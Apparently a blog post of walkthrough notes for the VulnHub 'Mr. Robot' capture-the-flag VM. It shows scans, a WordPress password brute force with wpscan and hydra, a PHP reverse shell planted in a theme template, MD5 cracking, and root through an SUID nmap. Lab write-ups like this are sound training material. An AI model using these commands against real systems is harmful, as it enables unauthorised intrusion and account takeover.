Skip to main content

VM 4 mr.Robot

Walkthru:
A. http://www.gcura.tech/vulnhub-mr-robot-1/ [Wordpress, Wscan brute force, sort/uniq pwd file, php revershell block, crack md5 pwd, search files with SUID bit set]

B. https://www.exploit-db.com/exploits/37292/ [local priv escalation which didn't work on execution . Getting exploit failed when run as ./ofs as deamon or user robot]

C. https://www.exploit-db.com/exploits/41963/ [didnt work. used burp to intercept and modify http request. one time it kind of work after I modified the request and got the option to email the link but still not sure how to access the reset link if the system was able to send the request in]

D. https://www.youtube.com/watch?v=vxFYfJbQAoc&has_verified=1[shows license.txt includes user/pwd for user elliot which I did not see in the app. but shows way to crack it using o/s]

E. https://aisherwood.gitbooks.io/reference-book/content/mr-robot.html [extract username from VM wiki site using cewl, use hydra to crack the pwd, use metasploit for reverse shell]

F. https://anandsecurity.blogspot.in/2016/08/ctf-mr-robot-1-challenge.html [use burp brute force to get username]

G. https://www.vulnhub.com/entry/mr-robot-1,151/ [other solutions]

Notes:
1. Scan shows
root@kali:~# nmap -sV 192.168.182.158

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-29 00:14 CDT
Nmap scan report for 192.168.182.158
Host is up (0.00033s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd
MAC Address: 00:0C:29:29:A5:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.26 seconds
root@kali:~#
2. Looks like the victim is running Apache on ports 80/tcp and 443/tcp. Safe to assume that we will be pwning a web server. Lets do some further scanning on the victim using nikto to find any vulnerabilities on the system.
root@kali:~# nikto -h 192.168.182.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.182.158
+ Target Hostname:    192.168.182.158
+ Target Port:        80
+ Start Time:         2017-03-29 02:25:24 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad 
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: ; rel=shortlink
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A WordPress installation was found.
+ /wp-admin/wp-login.php: WordPress login found
+ /blog/wp-login.php: WordPress login found
+ /wp-login.php: WordPress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2017-03-29 02:28:48 (GMT-5) (204 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
3. With nikto I was able to see that it was a WordPress site. I also see the /wp-login.php/readme.html,license.txt , and robots.txt files which look pretty interesting. Before we check these files, lets browse the web server and see what it gives us.

4. Well the server gives us a fancy intro and then gives us a message and a list of commands that we can run. None of them were that interesting but only the join command, where it asks for your email to “join” them. I didn’t put any email. Instead I looked into the files stated earlier. Lets check them out!

5. BINGO! Found the first key which turned out to be 073403c8a58a1f80d943455fb30724b9 and also a found file called fsocity.dic . Turns out to be a dictionary file. Maybe we will use this for later? For now lets save the file and continue on with the attack.
Key 1:
073403c8a58a1f80d943455fb30724b9

6. Well according to the readme.html file the victim is running WordPress Version 4.3.9 
6a. In another file which was revealed via Nikto/Dirb , shows different version. Upon login to WP shows this is correct version. 

7. I checked the liscense.txt file but found nothing of interest in there. Now lets check out /wp-login.php/ .

8. When viewing the page, I decided to see if there were any default username and passwords by inputting admin:admin ,but said the username was invalid. However, because of watching this show and knowing that the main character is elliot, I decided to input elliot as a username and password.[Not sure how we guessed the username]

9. Looks like we are on to something! I got the password wrong however WordPress confirms that elliot is a username on the site. I will be doing a dictionary attack on the WordPress using the fsocity.dic which I acquired earlier. Before I do the dictionary attack, I will try make the password list smaller using the commands listed below. This will make the attack go faster when trying to acquire elliot’s password. [sort -u is for unique]
root@kali:~/Documents# wc -l fsocity.dic 
858160 fsocity.dic
root@kali:~/Documents# cat fsocity.dic | sort -u | wc -l 
11451
root@kali:~/Documents# 
 cat fsocity.dic| sort -u | uniq > Newfsocity.dic
10. I was able to cut the dictionary down from 858160 words to 11451 and saved the shorter dictionary file to Newfsociety.dic. Now lets use wpscan to get the elliot’s password. [You may have to give exact path for the wordlist file]
root@kali:~# wpscan --url 192.168.182.158 --wordlist /root/Documents/Newfsocity.dic --username elliot
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.182.158/
[+] Started: Wed Mar 29 02:07:39 2017

[+] robots.txt available under: 'http://192.168.182.158/robots.txt'
[!] The WordPress 'http://192.168.182.158/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] XML-RPC Interface available under: http://192.168.182.158/xmlrpc.php

[+] WordPress version 4.3.9 identified from rss generator

[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
  Brute Forcing 'elliot' Time: 00:02:02 <====================================                                      > (5634 / 11452) 49.19%  ETA: 00:02:07
  [+] [SUCCESS] Login : elliot Password : ER28-0652


  +----+--------+------+-----------+
  | Id | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | elliot |      | ER28-0652 |
  +----+--------+------+-----------+

[+] Finished: Wed Mar 29 02:09:43 2017
[+] Requests Done: 5694
[+] Memory used: 29.953 MB
[+] Elapsed time: 00:02:04
root@kali:~/Downloads#
11. Nice! Elliot’s password is ER28-0652. Now lets log in.

looks like  WP version is 4.3.16

12. It worked! There are many things I can do from here like check which plugins installed are vulnerable so we can exploit them, but since elliot is the Administrator, I am going to try to upload a php file to get a reverse shell.
Note: I got the php-reverse-shell from pentestmonkey. The link to file can be located here. Also, before uploading the file, make sure to edit the ip variable and port variable. In my case my IP is 192.168.182.147 and the port I will use is 1234 .
14. Well looks like WordPress is set up to block my php file from uploading. They probably have the wp-config.php set up this way. Its all good, I still have another trick up my sleeve. Lets edit one of the pages and put our code from the reverse-shell-php file instead. Go to Appearance -> Editor -> 404.Template. Add the code to the bottom and click update file. Should look like the picture below.

15. Now set up the listener to catch the reverse shell.
16. Visit /wordpress/wp-content/themes/twentyfifteen/404.php from browser which should get you shell. Got a shell back with the user daemon
17. Used code below to spawn a tty shell.
python -c 'import pty; pty.spawn("/bin/sh")'
18. With that I snooped around and found in the /home/robot/ directory key 2 but got permission denied. I would have to be robot user (or root) to view it. However I did find a password.raw-md5 file. Maybe this might be a password to log in as robot? Lets open the file up.
$ ls
ls
key-2-of-3.txt password.raw-md5
$ ls -l
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
$
19. BINGO! I have the password hash for robot. I used crackstation.net to crack the password which revealed to be abcdefghijklmnopqrstuvwxyz . Alright lets log in as robot.
$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz

$ whoami
whoami
robot
$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
$
20. Now that we are logged in as robot lets get our 2nd key.
$ pwd
pwd
/home/robot
$ ls  
ls
key-2-of-3.txt password.raw-md5
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
$
2nd Key:
822c73956184f694993bede3eb39f959
21. Got our 2nd key. Now lets try to get root now! Lets try to find any files that have the SUID bit set.
$  find / -perm -4000 2>/dev/null
 find / -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
$
22. Well looks like we can run nmap as root since it has the SUID binary set. Lets check the version of nmap to see if it still supports interactive mode.
$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )
$
23. Nmap is running version 3.81 which means we can run nmap in interactive mode. We can use this to execute shell commands and get a root shell. Found a useful post that is helpful called Why You Can’t Un-Root a Compromised Machine .
Check it out. It’s very helpful. Now lets get our root shell and our last key.
$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
!sh
# whoami
whoami
root
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
#
24. We got root shell! Lets go to the root directory and get our last key.
#find / -name key*.txt OR
# cd /root
cd /root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Key 3:
04787ddef27c3dee1ee161b21670b4e4


============================================================


E. https://aisherwood.gitbooks.io/reference-book/content/mr-robot.html [extract username from VM wki site using cewl, use hydra to crack the pwd, use metasploit for reverse shell]


> cewl <wikipedia url> -d 0 -w userList


> hydra -L userList -P passList 192.168.100.181 http-form-post \


"/wp-login.php:log=^USER^&pwd=^PASS^:login_error""






=======================================================



D. https://www.youtube.com/watch?v=vxFYfJbQAoc&has_verified=1[shows license.txt includes user/pwd for user elliot which I did not see in the app. but shows way to crack it using o/s]



Kali> echo 1231231amxlau89013n,ma789= |base64 -d



elliot=ER28-0852









































Comments











Post a Comment























Popular posts from this blog





















28 VM SecOS-1




























Walkthru:   Notes:  A. https://c0d3g33k.blogspot.com/2017/01/secos.html [capture admin cookie using 127.0.0.1 in a code  test.html  with cross site scripting vulnerability,  CSRF attack, use  exploit 37088  for priv escalation ]  B. http://oldsmokingjoe.blogspot.com/2016/01/walkthrough-secos-1.html [ Hacking Node.js and MangoDB   ]   c. http://oldsmokingjoe.blogspot.com/2016/01/walkthrough-secos-1.html [use wget to post data from CLI. Add other cmds to ping cmd using curl and wget]   D. https://chousensha.github.io/blog/2015/02/04/pentest-lab-secos/ [SSH tunnel so we can access the ping site from Kali and dont have to pass via CLI]   Notes:  # Nmap 7.70 scan initiated Thu Jul 19 09:26:05 2018 as: nmap -sV -O -oN ../reports/192.168.117.6/192.168.117.6.nmap 192.168.117.6  Nmap scan report for 192.168.117.6  Host is up (0.00042s latency).  Not shown: 998 closed ports  PORT     STATE SERVICE VERSION  22/tcp   open  ssh  ...




















1 comment









Read more






























VM 9 : PHP Include And Post Exploitation




























      Walkthrough   1.        https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d   2.        Ine []   3.        http://megwhite.com.au/pentester-lab-bootcamp-walkthrough-php-include-post-exploitation/   4.        http://fallensnow-jack.blogspot.com/2014/07/pentester-lab-php-lfi-post-exploitation.html          Notes:    root@kali:~# nmap 10.0.0.12   Starting Nmap 7.40 ( https://nmap.org  ) at 2017-05-30 12:23 EDT  Nmap scan report for 10.0.0.12  Host is up (0.00035s latency).  Not shown: 999 filtered ports  PORT    STATE SERVICE  80/tcp open   http  MAC Address: 08:00:27:1F:12:24 (Oracle VirtualBox virtual NIC)   Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds  root@kali:~#   Enumerating port 80   Run dirb   root@kali:~# dirb http://10.0.0.12/   -----------------  DIRB v2.22  By The Dark Raver...




















1 comment









Read more






























VM 15: Kioptix 2014




























  Walkthru   Notes   2nd approach  using nc via web using php reverse shell           3rd approach   w/o metasploit      ===================   walkthru:  1.  Updating OpenFuck Exploit(764) but it didnt work here  @ https://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/  2.    ==============  Notes:  80/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)  MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox virtual NIC)  Running: FreeBSD 9.X|10.X  OS CPE: cpe:/o:freebsd:freebsd:9 cpe:/o:freebsd:freebsd:10  OS details: FreeBSD 9.0-RELEASE - 10.3-RELEASE   PORT     STATE SERVICE VERSION  8080/tcp open  http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)  |_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8  |_http-title: 403 Forbidden  MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox...




















Post a Comment









Read more